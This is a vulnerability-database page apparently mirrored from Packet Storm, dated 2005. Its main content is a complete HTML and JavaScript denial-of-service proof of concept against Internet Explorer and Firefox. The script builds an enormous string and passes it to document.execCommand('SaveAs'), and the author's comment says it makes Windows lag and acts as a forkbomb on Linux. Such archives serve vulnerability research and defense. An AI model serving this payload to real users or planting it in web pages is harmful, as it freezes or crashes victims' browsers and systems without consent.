Lucene search

K

browserDoS.txt

๐Ÿ—“๏ธย 14 Dec 2005ย 00:00:00Reported byย ZiplockTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 16ย Views

Denial of Service attack on Internet Explorer and Firefo

Show more
Code
`  
<!-- DoS for latest IE -- will make windows lag to hell  
Firefox in linux will turn into forkbomb, and Firefox windows will lag for a little while but seems to recover after a few minutes.  
Ziplock <[email protected]>  
  
tested with latest IE with all security patches installed 12/08/2005  
-->  
<html>  
<body>  
<script>  
var buffer = 'A';  
for (var i =0;i<100;i++) {  
buffer+=buffer+'A';  
}  
document.execCommand("SaveAs",buffer);  
</script>  
</body>  
</html>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
14 Dec 2005 00:00Current
7.4High risk
Vulners AI Score7.4
16
.json
Report